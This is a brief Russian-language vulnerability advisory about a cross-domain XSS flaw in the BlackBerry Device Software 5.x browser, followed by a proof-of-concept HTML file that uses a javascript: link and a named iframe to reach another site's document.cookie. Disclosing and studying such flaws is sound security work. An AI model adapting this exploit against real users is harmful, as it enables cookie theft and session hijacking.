Программа: BlackBerry Device Software 5.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за того, что браузер не правильно
ограничивает междоменный доступ. Атакующий может получить доступ к cookies на
web сайте, вложенным в iframe.
Эксплоит:
Создайте файл file.htm, сохраните его включив код ниже и загрузите на ваш
сервер.
<a href="javascript:window.open('javascript:alert(document.cookie)','blackb');">Test
me</a><br>
<iframe name="blackb" src="http://www.google.fr"> </iframe>
